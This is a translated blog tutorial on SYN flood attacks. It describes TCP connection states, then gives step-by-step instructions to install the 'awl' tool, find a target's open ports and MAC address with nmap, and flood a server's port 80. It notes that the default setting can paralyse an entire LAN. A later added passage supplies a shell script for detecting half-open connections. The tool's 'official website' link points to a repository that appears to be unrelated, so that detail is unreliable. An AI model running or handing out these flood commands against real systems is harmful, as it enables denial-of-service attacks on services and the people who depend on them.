AWL multi-Process SYN attack

Source: Internet
Author: User

I. TCP connection state diagram

[Image: TCP connection state diagram]

The description is as follows:

Server: LISTEN: listening for connection requests from a remote TCP port

Client: SYN-SENT: waiting for a matching connection request after having sent a connection request

Server: SYN-RECEIVED: waiting for confirmation of the connection request after having both received and sent a connection request

Client/Server: ESTABLISHED: represents an open connection

Client: FIN-WAIT-1: waiting for a connection termination request from the remote TCP, or for acknowledgment of the connection termination request previously sent

Server: CLOSE-WAIT: waiting for a connection termination request from the local user

Client: FIN-WAIT-2: waiting for a connection termination request from the remote TCP

Server: LAST-ACK: waiting for acknowledgment of the connection termination request previously sent to the remote TCP

Client: TIME-WAIT: waiting long enough to be sure that the remote TCP received the acknowledgment of its connection termination request

Server: CLOSED: no connection state



II. How a SYN flood attack works

After the server returns the SYN-ACK packet, if the originating client does not exist, the server never receives the ACK packet the client is supposed to send in response. The server then holds a certain amount of system memory for this pending connection until the wait times out and the connection is closed; only then is the memory released. Using IP spoofing, a malicious person sends a large number of SYN packets to the victim system, which creates a large number of pending connections on the server and consumes large amounts of memory and TCP connections, so that normal clients cannot access the server.


III. Using awl to carry out a SYN flood attack against a server

1. Official website: https://gitlab.com/davical-project/awl/tags


2. Download, extract, and install

tar -zxvf awl-0.2.tar.gz

./configure --prefix=/usr/local/awl

make -j 4

make install


3. awl command format

awl -i eth0 -m 00:0c:29:a9:f0:6c -d ip -p port

Description

-i  The interface used to send the packets; if omitted, the default is eth0

-m  The MAC address of the attacked machine. The program cannot obtain the MAC address from the attacked IP, so it must be specified manually: ping the target IP first, then run arp -a. If omitted, the default is FF:FF:FF:FF:FF:FF, which means the packets are broadcast to all hosts in the same network segment, all of them are SYN-attacked, and the entire LAN is easily paralyzed

-d  The IP address of the attacked machine

-p  The port of the attacked machine


4. Use nmap to view the target machine's open ports and MAC address

nmap 192.168.1.123

or ping 192.168.1.123, then run arp -n to view the MAC address




5. Testing

/usr/local/awl/bin/awl -i eth0 -m 00:0c:29:a9:f0:6c -d 192.168.1.123 -p 80



netstat -antup | grep 80
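
On the server, the pending connections described in section II show up in this netstat output as sockets in the SYN_RECV state. The following is an added example, not part of the original article: a shell function that counts SYN_RECV sockets per local port and reports ports at or above a threshold. The function names, the threshold and the sample netstat lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original article): report local ports with a
# pile-up of half-open (SYN_RECV) connections in `netstat -ant` output.

# syn_recv_report THRESHOLD   (THRESHOLD is an assumed tuning value)
# Reads netstat output on stdin; prints "port syn_recv_count distinct_sources"
# for every local port whose SYN_RECV count is >= THRESHOLD.
syn_recv_report() {
    awk -v limit="$1" '
        $1 ~ /^tcp/ && $6 == "SYN_RECV" {
            n = split($4, loc, ":"); port = loc[n]   # local port: last ":" field
            src = $5; sub(/:[0-9]+$/, "", src)       # remote IP without its port
            count[port]++
            if (!((port, src) in seen)) { seen[port, src] = 1; sources[port]++ }
        }
        END {
            for (p in count)
                if (count[p] >= limit)
                    printf "%s %d %d\n", p, count[p], sources[p]
        }' | sort -n
}

# Constructed sample input: six half-open connections to port 80 from five
# distinct (documentation-range) sources, plus unrelated sockets.
sample_netstat() {
    cat <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.123:80        198.51.100.7:40112      SYN_RECV
tcp        0      0 192.168.1.123:80        198.51.100.7:40113      SYN_RECV
tcp        0      0 192.168.1.123:80        203.0.113.21:1025       SYN_RECV
tcp        0      0 192.168.1.123:80        203.0.113.88:52344      SYN_RECV
tcp        0      0 192.168.1.123:80        192.0.2.14:6001         SYN_RECV
tcp        0      0 192.168.1.123:80        192.0.2.200:33911       SYN_RECV
tcp        0      0 192.168.1.123:80        192.168.1.50:51000      ESTABLISHED
tcp        0      0 192.168.1.123:8080      192.168.1.50:51001      ESTABLISHED
tcp        0      0 192.168.1.123:22        192.168.1.50:51002      SYN_RECV
EOF
}

sample_netstat | syn_recv_report 5   # prints: 80 6 5
```

On a live server the same function is fed with `netstat -ant | syn_recv_report 100`. Unlike `grep 80`, it matches the local port exactly, so the 8080 line in the sample is not counted.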





This article is from "A horse on the Plains" blog, please be sure to keep this source http://huangzp.blog.51cto.com/12434999/1908170
